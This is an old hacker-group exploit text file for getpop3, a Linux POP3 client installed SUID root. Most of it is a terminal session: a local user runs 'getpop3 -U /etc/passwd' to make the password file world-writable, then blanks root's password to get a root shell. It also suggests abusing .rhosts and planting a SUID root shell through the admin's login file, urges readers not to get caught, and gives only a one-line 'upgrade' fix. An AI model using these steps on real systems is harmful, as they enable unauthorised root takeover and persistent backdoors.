########################################
#what?:    [=-getpop3 exploit-=]       #
#who?:     [- by r3p3nt of the DHC -]  #
#where?:   [- http://dhc1.cjb.net -]   #
#contact?: [- tdefiance@hotmail.com    #
########################################
greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?)
thanks: jwb

        tdefiance@hotmail.com

You are wondering "hmm..what is getpop3, mister r3p3nt". Well, getpop3 is a
POP mail client for linux (no, not that stuff in Chex mix). This exploit has
been known by me for a very long time..so I might as well release it now.
This exploit was found when someone (he will go unnamed because I don't want
Joel to look like a fool) said his linux box was 'secure, no one can hack
it'. After some fumbling around on his box...root access was obtained.
The hole? Getpop3. Getpop3 is installed SUID root. If you dont know what 
SUID
root is..don't use this exploit@!$ When getpop3 is fed the -U parameter it 
sets
a file world writable. If you are a goon..here is how this could be good:

lamebox:~$ id
uid=1000(elf) gid=100(users) groups=100(users)
lamebox:~$ cp /etc/passwd /tmp/backup
lamebox:~$ getpop3 -V
getpop3 1.08 Copyright 1997 Double Precision, Inc.

lamebox:~$ getpop3 -U /etc/passwd
enter userid: elf
enter password: mypassword
enter host:poopy.reallame666.com
querying poopy.reallame666.com
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready 
Fri, 1
>USER elf
+OK Password required for elf
>PASS password
+OK elf's mailbox has 0 messages (0 octets)
>STAT
+OK 0 0
>QUIT
+OK poopy.reallame666.com POP3 server closing connection

*************************************************************
Whoo hooo! Now /etc/passwd is world writable..the fun begins*
Remember the file we backed up?            *
*************************************************************

lamebox:~$ cat /tmp/backup > /etc/passwd

***********************************************************************
now edit the passwd file so you are 0:0 ...like so:          *
root:x:0:0:super admin,,,:/root:/bin/bash <-- whats in the /etc/passwd*
root::0:0:your daddy,,,:/root/:bin/bash <-- what you change it to     *
Now log on as root!@#                   *
If you didn't fuck anything up you should be dropped to a root shell, *
and not asked for a password.                 *
Don't wanna overwrite /etc/passwd? Then use .rhosts .Hell, you could  *
even edit the admins .login ...and make it so when the logs in he/she *
tosses an SUID root shell in /tmp               *
Be creative in what you do, and don't get caught!          *
***********************************************************************

*************FIX*********************************************
* I havn't noticed the hole in the newer versions. Upgrade. *
*************************************************************